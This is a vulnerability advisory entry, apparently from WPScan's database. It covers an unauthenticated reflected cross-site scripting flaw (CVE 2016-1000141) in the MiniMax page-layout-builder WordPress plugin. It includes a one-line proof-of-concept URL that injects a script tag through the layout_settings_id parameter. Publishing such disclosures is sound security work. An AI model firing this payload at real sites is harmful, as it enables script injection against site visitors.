MiniMax <= 2.0.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"

Affects Plugin

no known fix
- plugin closed

References

CVE 2016-1000141
URL http://www.vapidlabs.com/wp/wp_advisory.php?v=358

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 6552
Verified Yes
WPVDB ID 8446

Timeline

Publicly Published 2016-04-12 (about 4 years ago)
Added 2016-04-14 (about 4 years ago)
Last Updated 2019-11-28 (7 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin